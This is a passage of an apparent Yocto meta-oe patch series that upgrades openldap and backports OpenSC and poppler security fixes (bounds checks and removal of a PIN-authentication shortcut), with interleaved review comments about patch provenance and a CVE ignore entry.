${S}/wechat_qrcode/*.prototxt } addtask unpack_extra after do_unpack before do_patch CMAKE_VERBOSE = "VERBOSE=1" -EXTRA_OECMAKE = "-DOPENCV_EXTRA_MODULES_PATH=${WORKDIR}/contrib/modules \ +EXTRA_OECMAKE = "-DOPENCV_EXTRA_MODULES_PATH=${S}/contrib/modules \ -DWITH_1394=OFF \ -DENABLE_PRECOMPILED_HEADERS=OFF \ -DCMAKE_SKIP_RPATH=ON \ -DOPENCV_ICV_HASH=${IPP_MD5} \ - -DIPPROOT=${WORKDIR}/ippicv_lnx \ + -DIPPROOT=${S}/ippicv_lnx \ -DOPENCV_GENERATE_PKGCONFIG=ON \ -DOPENCV_DOWNLOAD_PATH=${OPENCV_DLDIR} \ -DOPENCV_ALLOW_DOWNLOADS=OFF \ 
diff --git a/meta-oe/recipes-support/openldap/openldap/0001-ldif-filter-fix-parallel-build-failure.patch b/meta-oe/recipes-support/openldap/openldap/0001-ldif-filter-fix-parallel-build-failure.patch deleted file mode 100644 index b42bd9764f..0000000000 --- a/meta-oe/recipes-support/openldap/openldap/0001-ldif-filter-fix-parallel-build-failure.patch +++ /dev/null @@ -1,32 +0,0 @@ -From 9e4ccd1e78ceac8de1ab66ee62ee216f1fbd4956 Mon Sep 17 00:00:00 2001 -From: Yi Zhao <yi.zhao@windriver.com> -Date: Thu, 2 Dec 2021 11:38:15 +0800 -Subject: [PATCH] ldif-filter: fix parallel build failure - -Add slapd-common.o as dependency for ldif-filter to fix the parallel -build failure: - ld: cannot find slapd-common.o: No such file or directory - -Upstream-Status: Pending - -Signed-off-by: Yi Zhao <yi.zhao@windriver.com> ---- - tests/progs/Makefile.in | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/tests/progs/Makefile.in b/tests/progs/Makefile.in -index 13f1e8be2..e4f4ccf98 100644 ---- a/tests/progs/Makefile.in -+++ b/tests/progs/Makefile.in -@@ -56,7 +56,7 @@ slapd-modify: slapd-modify.o $(OBJS) $(XLIBS) - slapd-bind: slapd-bind.o $(OBJS) $(XLIBS) - $(LTLINK) -o $@ slapd-bind.o $(OBJS) $(LIBS) - --ldif-filter: ldif-filter.o $(XLIBS) -+ldif-filter: ldif-filter.o $(OBJS) $(XLIBS) - $(LTLINK) -o $@ ldif-filter.o $(OBJS) $(LIBS) - - slapd-mtread: slapd-mtread.o $(OBJS) $(XLIBS) --- -2.25.1 - diff --git a/meta-oe/recipes-support/openldap/openldap/0001-libraries-Makefile.in-ignore-the-mkdir-errors.patch b/meta-oe/recipes-support/openldap/openldap/0001-libraries-Makefile.in-ignore-the-mkdir-errors.patch deleted file mode 100644 index 552726bb0a..0000000000 --- a/meta-oe/recipes-support/openldap/openldap/0001-libraries-Makefile.in-ignore-the-mkdir-errors.patch +++ /dev/null 
@@ -1,33 +0,0 @@ -From 690f69791eb6cd0d7e94b4d73219ee864de27f62 Mon Sep 17 00:00:00 2001 -From: Yi Zhao <yi.zhao@windriver.com> -Date: Mon, 10 Jan 2022 10:13:51 +0800 -Subject: [PATCH] libraries/Makefile.in: ignore the mkdir errors - -Ignore the mkdir errors to fix the parallel build failure: - -../../build/shtool mkdir -p TOPDIR/tmp-glibc/work/cortexa15t2hf-neon-wrs-linux-gnueabi/openldap/2.5.9-r0/image/usr/lib -mkdir: cannot create directory 'TOPDIR/tmp-glibc/work/cortexa15t2hf-neon-wrs-linux-gnueabi/openldap/2.5.9-r0/image/usr/lib': File exists - -Upstream-Status: Pending - -Signed-off-by: Yi Zhao <yi.zhao@windriver.com> ---- - libraries/Makefile.in | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/libraries/Makefile.in b/libraries/Makefile.in -index d9cb2ff..c6b251f 100644 ---- a/libraries/Makefile.in -+++ b/libraries/Makefile.in -@@ -24,7 +24,7 @@ PKGCONFIG_DIR=$(DESTDIR)$(libdir)/pkgconfig - PKGCONFIG_SRCDIRS=liblber libldap - - install-local: -- @$(MKDIR) $(PKGCONFIG_DIR) -+ @-$(MKDIR) $(PKGCONFIG_DIR) - @for i in $(PKGCONFIG_SRCDIRS); do \ - $(INSTALL_DATA) $$i/*.pc $(PKGCONFIG_DIR); \ - done --- -2.17.1 - diff --git a/meta-oe/recipes-support/openldap/openldap/0001-librewrite-include-ldap_pvt_thread.h-before-redefini.patch b/meta-oe/recipes-support/openldap/openldap/0001-librewrite-include-ldap_pvt_thread.h-before-redefini.patch deleted file mode 100644 index bcd1525b67..0000000000 --- a/meta-oe/recipes-support/openldap/openldap/0001-librewrite-include-ldap_pvt_thread.h-before-redefini.patch +++ /dev/null 
@@ -1,54 +0,0 @@ -From 79381ab335898c9184e22dd25b544adefa9bf6c5 Mon Sep 17 00:00:00 2001 -From: Khem Raj <raj.khem@gmail.com> -Date: Mon, 7 Feb 2022 16:26:57 -0800 -Subject: [PATCH] librewrite: include ldap_pvt_thread.h before redefining - calloc - -This helps compiling with musl, where sched.h is included by -ldap_pvt_thread.h which provides prototype for calloc() and conflicts - -/usr/include/sched.h:84:7: error: conflicting types for 'ber_memcalloc' -| void *calloc(size_t, size_t); -| ^1 -| warning and 1 error generated. -| ./rewrite-int.h:44:21: note: expanded from macro 'calloc' -| #define calloc(x,y) ber_memcalloc(x,y) -| ^ - -Upstream-Status: Pending -Signed-off-by: Khem Raj <raj.khem@gmail.com> ---- - libraries/librewrite/rewrite-int.h | 10 +++++----- - 1 file changed, 5 insertions(+), 5 deletions(-) - -diff --git a/libraries/librewrite/rewrite-int.h b/libraries/librewrite/rewrite-int.h -index 4481dd3..5ec226d 100644 ---- a/libraries/librewrite/rewrite-int.h -+++ b/libraries/librewrite/rewrite-int.h -@@ -40,6 +40,11 @@ - - #include <rewrite.h> - -+#ifndef NO_THREADS -+#define USE_REWRITE_LDAP_PVT_THREADS -+#include <ldap_pvt_thread.h> -+#endif -+ - #define malloc(x) ber_memalloc(x) - #define calloc(x,y) ber_memcalloc(x,y) - #define realloc(x,y) ber_memrealloc(x,y) -@@ -47,11 +52,6 @@ - #undef strdup - #define strdup(x) ber_strdup(x) - --#ifndef NO_THREADS --#define USE_REWRITE_LDAP_PVT_THREADS --#include <ldap_pvt_thread.h> --#endif -- - /* - * For details, see RATIONALE. - */ --- -2.35.1 - diff --git a/meta-oe/recipes-support/openldap/openldap_2.5.12.bb b/meta-oe/recipes-support/openldap/openldap_2.5.16.bb index e4475e5069..9e9d05917d 100644 --- a/meta-oe/recipes-support/openldap/openldap_2.5.12.bb +++ b/meta-oe/recipes-support/openldap/openldap_2.5.16.bb 
@@ -19,13 +19,10 @@ SRC_URI = "http://www.openldap.org/software/download/OpenLDAP/openldap-release/$ file://initscript \ file://slapd.service \ file://remove-user-host-pwd-from-version.patch \ - file://0001-ldif-filter-fix-parallel-build-failure.patch \ file://0001-build-top.mk-unset-STRIP_OPTS.patch \ - file://0001-libraries-Makefile.in-ignore-the-mkdir-errors.patch \ - file://0001-librewrite-include-ldap_pvt_thread.h-before-redefini.patch \ " -SRC_URI[sha256sum] = "d5086cbfc49597fa7d0670a429a9054552d441b16ee8b2435412797ab0e37b96" +SRC_URI[sha256sum] = "546ba591822e8bb0e467d40c4d4a30f89d937c3a507fe83a578f582f6a211327" DEPENDS = "util-linux groff-native" diff --git a/meta-oe/recipes-support/opensc/files/CVE-2023-2977.patch b/meta-oe/recipes-support/opensc/files/CVE-2023-2977.patch new file mode 100644 index 0000000000..6a635a7ce6 --- /dev/null +++ b/meta-oe/recipes-support/opensc/files/CVE-2023-2977.patch 
@@ -0,0 +1,53 @@
+commit 81944d1529202bd28359bede57c0a15deb65ba8a
+Author: fullwaywang <fullwaywang@tencent.com>
+Date: Mon May 29 10:38:48 2023 +0800
+Subject: [PATCH] pkcs15init: correct left length calculation to fix buffer overrun bug.
+
+ Fixes #2785
+
+CVE: CVE-2023-2977
+
+Upstream-Status: Backport [https://github.com/OpenSC/OpenSC/pull/2787/commits/3bf3ab2f9091f984cda6dd910654ccbbe3f06a40]
+
+Signed-off-by: Soumya <soumya.sambu@windriver.com>
+---
+
+diff --git a/src/pkcs15init/pkcs15-cardos.c b/src/pkcs15init/pkcs15-cardos.c
+index 9715cf39..f41f73c3 100644
+--- a/src/pkcs15init/pkcs15-cardos.c
++++ b/src/pkcs15init/pkcs15-cardos.c
+@@ -872,7 +872,7 @@ static int cardos_have_verifyrc_package(sc_card_t *card)
+ sc_apdu_t apdu;
+ u8 rbuf[SC_MAX_APDU_BUFFER_SIZE];
+ int r;
+- const u8 *p = rbuf, *q;
++ const u8 *p = rbuf, *q, *pp;
+ size_t len, tlen = 0, ilen = 0;
+
+ sc_format_apdu(card, &apdu, SC_APDU_CASE_2_SHORT, 0xca, 0x01, 0x88);
+@@ -888,13 +888,13 @@ static int cardos_have_verifyrc_package(sc_card_t *card)
+ return 0;
+
+ while (len != 0) {
+- p = sc_asn1_find_tag(card->ctx, p, len, 0xe1, &tlen);
+- if (p == NULL)
++ pp = sc_asn1_find_tag(card->ctx, p, len, 0xe1, &tlen);
++ if (pp == NULL)
+ return 0;
+ if (card->type == SC_CARD_TYPE_CARDOS_M4_3) {
+ /* the verifyRC package on CardOS 4.3B use Manufacturer ID 0x01 */
+ /* and Package Number 0x07 */
+- q = sc_asn1_find_tag(card->ctx, p, tlen, 0x01, &ilen);
++ q = sc_asn1_find_tag(card->ctx, pp, tlen, 0x01, &ilen);
+ if (q == NULL || ilen != 4)
+ return 0;
+ if (q[0] == 0x07)
+@@ -902,7 +902,7 @@ static int cardos_have_verifyrc_package(sc_card_t *card)
+ } else if (card->type == SC_CARD_TYPE_CARDOS_M4_4) {
+ /* the verifyRC package on CardOS 4.4 use Manufacturer ID 0x03 */
+ /* and Package Number 0x02 */
+- q = sc_asn1_find_tag(card->ctx, p, tlen, 0x03, &ilen);
++ q = sc_asn1_find_tag(card->ctx, pp, tlen, 0x03, &ilen);
+ if (q == NULL || ilen != 4)
+ return 0;
+ if (q[0] == 0x02)
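Review bot: The patch header names commit `81944d1529202bd28359bede57c0a15deb65ba8a` while `Upstream-Status: Backport` points at `3bf3ab2f9091f984cda6dd910654ccbbe3f06a40` inside pull request 2787, so the two provenance references disagree. One is probably the merged commit and the other the pull-request commit, but a reader auditing this CVE fix cannot tell which one the hunks were taken from; the Upstream-Status URL should be the commit that landed upstream and should match the id in the header. The header also mixes `git show` fields (`commit`, `Author:`) with a `Subject: [PATCH]` line, which suggests hand editing, so the three hunks are worth re-checking against upstream. In the code itself the loop now keeps `p` as the cursor and uses `pp` for the found tag, but the part of `cardos_have_verifyrc_package` that advances `p` and `len` lies outside the hunks shown.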
diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40660.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40660.patch
new file mode 100644
index 0000000000..74e547298f
--- /dev/null
+++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40660.patch
@@ -0,0 +1,55 @@
+Origin: https://github.com/OpenSC/OpenSC/commit/868f76fb31255fd3fdacfc3e476452efeb61c3e7
+From: Frank Morgner <frankmorgner@gmail.com>
+Date: Wed, 21 Jun 2023 12:27:23 +0200
+Subject: Fixed PIN authentication bypass
+
+If two processes are accessing a token, then one process may leave the
+card usable with an authenticated PIN so that a key may sign/decrypt any
+data. This is especially the case if the token does not support a way of
+resetting the authentication status (logout).
+
+We have some tracking of the authentication status in software via
+PKCS#11, Minidriver (os-wise) and CryptoTokenKit, which is why a
+PIN-prompt will appear even though the card may technically be unlocked
+as described in the above example. However, before this change, an empty
+PIN was not verified (likely yielding an error during PIN-verification),
+but it was just checked whether the PIN is authenticated. This defeats
+the purpose of the PIN verification, because an empty PIN is not the
+correct one. Especially during OS Logon, we don't want that kind of
+shortcut, but we want the user to verify the correct PIN (even though
+the token was left unattended and authentication at the computer).
+
+This essentially reverts commit e6f7373ef066cfab6e3162e8b5f692683db23864.
+
+CVE: CVE-2023-40660
+Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/940e8bc764047c873f88bb1396933a5368d03533]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+ src/libopensc/pkcs15-pin.c | 13 -------------
+ 1 file changed, 13 deletions(-)
+
+diff --git a/src/libopensc/pkcs15-pin.c b/src/libopensc/pkcs15-pin.c
+index 80a185fecd..393234efe4 100644
+--- a/src/libopensc/pkcs15-pin.c
++++ b/src/libopensc/pkcs15-pin.c
+@@ -307,19 +307,6 @@
+ LOG_FUNC_RETURN(ctx, SC_ERROR_INVALID_PIN_REFERENCE);
+ auth_info = (struct sc_pkcs15_auth_info *)pin_obj->data;
+
+- /*
+- * if pin cache is disabled, we can get here with no PIN data.
+- * in this case, to avoid error or unnecessary pin prompting on pinpad,
+- * check if the PIN has been already verified and the access condition
+- * is still open on card.
+- */
+- if (pinlen == 0) {
+- r = sc_pkcs15_get_pin_info(p15card, pin_obj);
+-
+- if (r == SC_SUCCESS && auth_info->logged_in == SC_PIN_STATE_LOGGED_IN)
+- LOG_FUNC_RETURN(ctx, r);
+- }
+-
+ r = _validate_pin(p15card, auth_info, pinlen);
+
+ if (r)
+
diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-1.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-1.patch
new file mode 100644
index 0000000000..3ecff558cf
--- /dev/null
+++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-1.patch
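Review bot: `Origin:` names the upstream OpenSC commit `868f76fb31255fd3fdacfc3e476452efeb61c3e7`, but `Upstream-Status: Backport` cites a Debian packaging commit on salsa.debian.org, so the status tag does not identify the upstream change that was backported. The same pattern repeats in CVE-2023-40661-1.patch through CVE-2023-40661-7.patch, where seven different `Origin:` commits all carry one identical salsa URL (commit `8026fb4ca0ed53d970c6c497252eb264d4192d50`) together with the remark `Hunk refreshed based on codebase`. For security fixes whose hunks were adjusted by hand, each patch should point at its own upstream commit, here `Upstream-Status: Backport [https://github.com/OpenSC/OpenSC/commit/868f76fb31255fd3fdacfc3e476452efeb61c3e7]`, so a later audit can diff the backport against the original. The inner hunk headers in these files also carry no function name after `@@`, which makes that comparison harder.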
@@ -0,0 +1,47 @@
+Origin: https://github.com/OpenSC/OpenSC/commit/245efe608d083fd4e4ec96793fdefd218e26fde7
+From: Jakub Jelen <jjelen@redhat.com>
+Date: Thu, 17 Aug 2023 13:54:42 +0200
+Subject: pkcs15: Avoid buffer overflow when getting last update
+
+Thanks oss-fuzz
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=60769
+
+CVE: CVE-2023-40661
+Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Hunk refreshed based on codebase.
+
+---
+ src/libopensc/pkcs15.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/src/libopensc/pkcs15.c b/src/libopensc/pkcs15.c
+index eb7fc6afcd..4215b733a8 100644
+--- a/src/libopensc/pkcs15.c
++++ b/src/libopensc/pkcs15.c
+@@ -528,7 +528,7 @@
+ struct sc_context *ctx = p15card->card->ctx;
+ struct sc_file *file = NULL;
+ struct sc_asn1_entry asn1_last_update[C_ASN1_LAST_UPDATE_SIZE];
+- unsigned char *content, last_update[32];
++ unsigned char *content, last_update[32] = {0};
+ size_t lupdate_len = sizeof(last_update) - 1;
+ int r, content_len;
+ size_t size;
+@@ -564,9 +564,11 @@
+ if (r < 0)
+ return NULL;
+
+- p15card->tokeninfo->last_update.gtime = strdup((char *)last_update);
+- if (!p15card->tokeninfo->last_update.gtime)
+- return NULL;
++ if (asn1_last_update[0].flags & SC_ASN1_PRESENT) {
++ p15card->tokeninfo->last_update.gtime = strdup((char *)last_update);
++ if (!p15card->tokeninfo->last_update.gtime)
++ return NULL;
++ }
+ done:
+ sc_log(ctx, "lastUpdate.gtime '%s'", p15card->tokeninfo->last_update.gtime);
+ return p15card->tokeninfo->last_update.gtime;
+
diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-2.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-2.patch
new file mode 100644
index 0000000000..39e729c5a9
--- /dev/null
+++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-2.patch
@@ -0,0 +1,32 @@
+Origin: https://github.com/OpenSC/OpenSC/commit/440ca666eff10cc7011901252d20f3fc4ea23651
+From: Jakub Jelen <jjelen@redhat.com>
+Date: Thu, 17 Aug 2023 13:41:36 +0200
+Subject: setcos: Avoid buffer underflow
+
+Thanks oss-fuzz
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=60672
+CVE: CVE-2023-40661
+Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Hunk refreshed based on codebase.
+---
+ src/pkcs15init/pkcs15-setcos.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/src/pkcs15init/pkcs15-setcos.c b/src/pkcs15init/pkcs15-setcos.c
+index 1b56afe6d9..1907b47f9d 100644
+--- a/src/pkcs15init/pkcs15-setcos.c
++++ b/src/pkcs15init/pkcs15-setcos.c
+@@ -346,6 +346,10 @@
+
+ /* Replace the path of instantiated key template by the path from the object data. */
+ memcpy(&file->path, &key_info->path, sizeof(file->path));
++ if (file->path.len < 2) {
++ sc_file_free(file);
++ LOG_TEST_RET(ctx, SC_ERROR_INVALID_DATA, "Invalid path");
++ }
+ file->id = file->path.value[file->path.len - 2] * 0x100 +
+ file->path.value[file->path.len - 1];
+
+
diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-3.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-3.patch
new file mode 100644
index 0000000000..7950cf91df
--- /dev/null
+++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-3.patch
@@ -0,0 +1,31 @@
+Origin: https://github.com/OpenSC/OpenSC/commit/41d61da8481582e12710b5858f8b635e0a71ab5e
+From: Jakub Jelen <jjelen@redhat.com>
+Date: Wed, 20 Sep 2023 10:13:57 +0200
+Subject: oberthur: Avoid buffer overflow
+
+Thanks oss-fuzz
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=60650
+CVE: CVE-2023-40661
+Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Hunk refreshed based on codebase.
+---
+ src/pkcs15init/pkcs15-oberthur.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/src/pkcs15init/pkcs15-oberthur.c b/src/pkcs15init/pkcs15-oberthur.c
+index ad2cabd530..c441ab1e76 100644
+--- a/src/pkcs15init/pkcs15-oberthur.c
++++ b/src/pkcs15init/pkcs15-oberthur.c
+@@ -688,6 +688,9 @@
+ if (object->type != SC_PKCS15_TYPE_PRKEY_RSA)
+ LOG_TEST_RET(ctx, SC_ERROR_NOT_SUPPORTED, "Create key failed: RSA only supported");
+
++ if (key_info->path.len < 2)
++ LOG_TEST_RET(ctx, SC_ERROR_OBJECT_NOT_VALID, "The path needs to be at least to bytes long");
++
+ sc_log(ctx, "create private key ID:%s", sc_pkcs15_print_id(&key_info->id));
+ /* Here, the path of private key file should be defined.
+ * Nevertheless, we need to instantiate private key to get the ACLs. */
+
diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-4.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-4.patch
new file mode 100644
index 0000000000..797f8ad3b1
--- /dev/null
+++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-4.patch
@@ -0,0 +1,28 @@
+Origin: https://github.com/OpenSC/OpenSC/commit/578aed8391ef117ca64a9e0cba8e5c264368a0ec
+From: Frank Morgner <frankmorgner@gmail.com>
+Date: Thu, 8 Dec 2022 00:27:18 +0100
+Subject: sc_pkcs15init_rmdir: prevent out of bounds write
+
+fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53927
+CVE: CVE-2023-40661
+Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Hunk refreshed based on codebase.
+---
+ src/pkcs15init/pkcs15-lib.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/pkcs15init/pkcs15-lib.c b/src/pkcs15init/pkcs15-lib.c
+index 91cee37310..3df03c6e1f 100644
+--- a/src/pkcs15init/pkcs15-lib.c
++++ b/src/pkcs15init/pkcs15-lib.c
+@@ -666,6 +666,8 @@
+
+ path = df->path;
+ path.len += 2;
++ if (path.len > SC_MAX_PATH_SIZE)
++ return SC_ERROR_INTERNAL;
+
+ nfids = r / 2;
+ while (r >= 0 && nfids--) {
+
diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-5.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-5.patch
new file mode 100644
index 0000000000..e173e65575
--- /dev/null
+++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-5.patch
@@ -0,0 +1,30 @@
+Origin: https://github.com/OpenSC/OpenSC/commit/c449a181a6988cc1e8dc8764d23574e48cdc3fa6
+From: =?UTF-8?q?Veronika=20Hanul=C3=ADkov=C3=A1?= <vhanulik@redhat.com>
+Date: Mon, 19 Jun 2023 16:14:51 +0200
+Subject: pkcs15-cflex: check path length to prevent underflow
+
+Thanks OSS-Fuzz
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=58932
+CVE: CVE-2023-40661
+Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Hunk refreshed based on codebase.
+---
+ src/pkcs15init/pkcs15-cflex.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/src/pkcs15init/pkcs15-cflex.c b/src/pkcs15init/pkcs15-cflex.c
+index d06568073d..ce1d48e62c 100644
+--- a/src/pkcs15init/pkcs15-cflex.c
++++ b/src/pkcs15init/pkcs15-cflex.c
+@@ -56,6 +56,9 @@
+ int r = 0;
+ /* Select the parent DF */
+ path = df->path;
++ if (path.len < 2) {
++ return SC_ERROR_INVALID_ARGUMENTS;
++ }
+ path.len -= 2;
+ r = sc_select_file(p15card->card, &path, &parent);
+ if (r < 0)
+
diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-6.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-6.patch
new file mode 100644
index 0000000000..abb524de29
--- /dev/null
+++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-6.patch
@@ -0,0 +1,30 @@
+Origin: https://github.com/OpenSC/OpenSC/commit/df5a176bfdf8c52ba89c7fef1f82f6f3b9312bc1
+From: Veronika Hanulikova <xhanulik@fi.muni.cz>
+Date: Fri, 10 Feb 2023 11:47:34 +0100
+Subject: Check array bounds
+
+Thanks OSS-Fuzz
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=54312
+CVE: CVE-2023-40661
+Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Hunk refreshed based on codebase.
+---
+ src/libopensc/muscle.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/src/libopensc/muscle.c b/src/libopensc/muscle.c
+index 61a4ec24d8..9d01e0c113 100644
+--- a/src/libopensc/muscle.c
++++ b/src/libopensc/muscle.c
+@@ -183,6 +183,9 @@
+ sc_apdu_t apdu;
+ int r;
+
++ if (dataLength + 9 > MSC_MAX_APDU)
++ return SC_ERROR_INVALID_ARGUMENTS;
++
+ sc_format_apdu(card, &apdu, SC_APDU_CASE_3_SHORT, 0x54, 0x00, 0x00);
+ apdu.lc = dataLength + 9;
+ if (card->ctx->debug >= 2)
+
diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-7.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-7.patch
new file mode 100644
index 0000000000..858a996ed7
--- /dev/null
+++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-7.patch
@@ -0,0 +1,40 @@
+Origin: https://github.com/OpenSC/OpenSC/commit/5631e9843c832a99769def85b7b9b68b4e3e3959
+From: Veronika Hanulikova <xhanulik@fi.muni.cz>
+Date: Fri, 3 Mar 2023 16:07:38 +0100
+Subject: Check length of string before making copy
+
+Thanks OSS-Fuzz
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=55851
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=55998
+CVE: CVE-2023-40661
+Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Hunk refreshed based on codebase.
+---
+ src/pkcs15init/profile.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/pkcs15init/profile.c b/src/pkcs15init/profile.c
+index 2b793b0282..3bad1e8536 100644
+--- a/src/pkcs15init/profile.c
++++ b/src/pkcs15init/profile.c
+@@ -1465,6 +1465,8 @@
+ while (argc--) {
+ unsigned int op, method, id;
+
++ if (strlen(*argv) >= sizeof(oper))
++ goto bad;
+ strlcpy(oper, *argv++, sizeof(oper));
+ if ((what = strchr(oper, '=')) == NULL)
+ goto bad;
+@@ -2128,6 +2130,9 @@
+ return get_uint(cur, value, type);
+ }
+
++ if (strlen(value) >= sizeof(temp))
++ return 1;
++
+ n = strcspn(value, "0123456789x");
+ strlcpy(temp, value, (sizeof(temp) > n) ? n + 1 : sizeof(temp));
+
+
diff --git a/meta-oe/recipes-support/opensc/opensc_0.22.0.bb b/meta-oe/recipes-support/opensc/opensc_0.22.0.bb
index f8b4af0c4f..770c2d686b 100644
--- a/meta-oe/recipes-support/opensc/opensc_0.22.0.bb
+++ b/meta-oe/recipes-support/opensc/opensc_0.22.0.bb
@@ -14,7 +14,21 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=cb8aedd3bced19bd8026d96a8b6876d7" #v0.21.0 SRCREV = "c902e1992195e00ada12d71beb1029287cd72037" SRC_URI = "git://github.com/OpenSC/OpenSC;branch=master;protocol=https \ + file://CVE-2023-2977.patch \ + file://CVE-2023-40660.patch \ + file://CVE-2023-40661-1.patch \ + file://CVE-2023-40661-2.patch \ + file://CVE-2023-40661-3.patch \ + file://CVE-2023-40661-4.patch \ + file://CVE-2023-40661-5.patch \ + file://CVE-2023-40661-6.patch \ + file://CVE-2023-40661-7.patch \ " + +# CVE-2021-34193 is a duplicate CVE covering the 5 individual +# https://github.com/OpenSC/OpenSC/pull/2855/commits/7a049fc3922060fb75cb9fea9e58eef9edc357ae +CVE_CHECK_IGNORE += "CVE-2021-34193" + DEPENDS = "virtual/libiconv openssl" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-support/poppler/poppler/0001-JBIG2Stream-Fix-crash-on-broken-file.patch b/meta-oe/recipes-support/poppler/poppler/0001-JBIG2Stream-Fix-crash-on-broken-file.patch new file mode 100644 index 0000000000..4a8ea233c8 --- /dev/null +++ b/meta-oe/recipes-support/poppler/poppler/0001-JBIG2Stream-Fix-crash-on-broken-file.patch 
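Review bot: The comment justifying `CVE_CHECK_IGNORE += "CVE-2021-34193"` stops mid-sentence ("covering the 5 individual") and never names the five CVEs it refers to, so nothing in the recipe shows that those individual issues are fixed in the pinned revision. An ignore entry silences the scanner for as long as it stays in the recipe, so the comment should list the five CVE ids and say in which release or commit each was fixed relative to this `SRCREV`. The `#v0.21.0` marker above `SRCREV` in a recipe named opensc_0.22.0.bb adds to the doubt about which version is being built and should be corrected or dropped. Separately, CVE-2023-2977.patch is added under `opensc/files/` while the other eight patches go under `opensc/opensc/`; keeping them in one directory avoids surprises with file lookup order.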
@@ -0,0 +1,41 @@
+From 27354e9d9696ee2bc063910a6c9a6b27c5184a52 Mon Sep 17 00:00:00 2001
+From: Albert Astals Cid <aacid@kde.org>
+Date: Thu, 25 Aug 2022 00:14:22 +0200
+Subject: [PATCH] JBIG2Stream: Fix crash on broken file
+
+https://github.com/jeffssh/CVE-2021-30860
+
+Thanks to David Warren for the heads up
+
+CVE: CVE-2021-30860
+
+References:
+https://nvd.nist.gov/vuln/detail/CVE-2021-30860
+
+Upstream-Status: Backport
+[https://gitlab.freedesktop.org/poppler/poppler/-/commit/27354e9d9696ee2bc063910a6c9a6b27c5184a52]
+
+Signed-off-by: Yogita Urade <yogita.urade@windriver.com>
+---
+ poppler/JBIG2Stream.cc | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/poppler/JBIG2Stream.cc b/poppler/JBIG2Stream.cc
+index 662276e5..9f70431d 100644
+--- a/poppler/JBIG2Stream.cc
++++ b/poppler/JBIG2Stream.cc
+@@ -1976,7 +1976,11 @@ void JBIG2Stream::readTextRegionSeg(unsigned int segNum, bool imm, bool lossless
+ for (i = 0; i < nRefSegs; ++i) {
+ if ((seg = findSegment(refSegs[i]))) {
+ if (seg->getType() == jbig2SegSymbolDict) {
+- numSyms += ((JBIG2SymbolDict *)seg)->getSize();
++ const unsigned int segSize = ((JBIG2SymbolDict *)seg)->getSize();
++ if (unlikely(checkedAdd(numSyms, segSize, &numSyms))) {
